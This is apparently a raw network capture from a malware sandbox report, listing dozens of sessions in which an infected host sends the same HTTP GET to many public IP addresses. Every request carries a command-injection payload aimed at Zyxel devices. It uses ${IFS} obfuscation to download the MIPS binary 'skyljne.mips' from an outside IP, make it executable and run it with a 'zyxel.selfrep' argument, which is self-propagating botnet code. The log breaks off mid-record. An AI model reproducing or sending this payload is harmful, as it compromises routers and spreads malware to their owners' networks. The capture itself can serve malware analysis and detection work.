                                          Jan 14, 2024 15:46:37.485498905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9493192.168.2.234534690.220.94.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485557079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9494192.168.2.2347046217.95.236.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485615969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9495192.168.2.235430865.83.247.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485660076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9496192.168.2.235149683.110.247.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485686064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9497192.168.2.235166496.158.180.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485752106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9498192.168.2.2343532200.149.134.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485791922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9499192.168.2.2360356213.10.233.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485842943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9500192.168.2.234175464.213.4.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485879898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9501192.168.2.233992019.124.188.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485960960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9502192.168.2.2347488129.72.59.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.485981941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9503192.168.2.2335538149.150.193.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.486057997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9504192.168.2.2354126111.44.127.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.486114979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9505192.168.2.2344198129.37.3.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.486145020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9506192.168.2.2355132183.105.192.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.486200094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9507192.168.2.2343742138.95.133.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.486243963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9508192.168.2.234666620.34.101.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.486334085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9509192.168.2.235635863.237.233.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.486371040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9510192.168.2.2339478164.81.147.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.486428022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9511192.168.2.2353374213.235.92.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.486480951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9512192.168.2.233513432.219.0.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.486526966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9513192.168.2.2349874182.111.42.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.486582994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9514192.168.2.235869048.115.124.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.486635923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9515192.168.2.235643892.3.22.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.486666918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9516192.168.2.2341186110.49.239.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.486709118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9517192.168.2.2360140197.12.249.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.486797094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9518192.168.2.234934894.252.221.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.486881018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9519192.168.2.235419439.235.55.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.486939907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9520192.168.2.2333350133.20.157.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487001896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9521192.168.2.2340566176.225.94.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487057924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9522192.168.2.2343860213.223.16.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487108946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9523192.168.2.2335200162.55.240.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487152100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9524192.168.2.2347314138.122.179.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487204075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9525192.168.2.2336296189.242.144.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487255096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9526192.168.2.2360538195.107.60.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487308025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9527192.168.2.2341378139.0.159.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487355947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9528192.168.2.233835439.62.245.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487422943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9529192.168.2.234770089.133.255.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487463951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9530192.168.2.2358404180.179.230.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487524033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9531192.168.2.2344550111.107.35.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487550974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9532192.168.2.2352388182.43.226.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487623930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9533192.168.2.235175084.113.127.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487668991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9534192.168.2.2356554207.114.20.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487723112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9535192.168.2.2357112218.115.226.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487754107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9536192.168.2.236012618.252.218.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487818956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9537192.168.2.2333296105.62.70.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487847090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9538192.168.2.235585212.136.11.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487879038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9539192.168.2.2334254154.11.99.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.487950087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9540192.168.2.2350856115.161.244.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488003016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9541192.168.2.234791012.195.169.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488049984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9542192.168.2.23500045.43.186.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488080025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9543192.168.2.2357148116.101.138.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488132954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9544192.168.2.2358848190.251.229.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488210917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9545192.168.2.235152444.154.156.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488262892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9546192.168.2.233349275.93.120.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488282919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9547192.168.2.234680864.246.131.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488346100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9548192.168.2.2351596128.226.70.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488426924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9549192.168.2.234976225.8.75.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488462925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9550192.168.2.23407884.98.42.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488514900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9551192.168.2.2350246104.118.174.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488575935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9552192.168.2.2338624158.204.123.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488610983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9553192.168.2.235963874.67.147.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488641024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9554192.168.2.2346172124.17.253.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:37.488724947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9555192.168.2.233299689.21.107.244443
                                          TimestampBytes transferredDirectionData
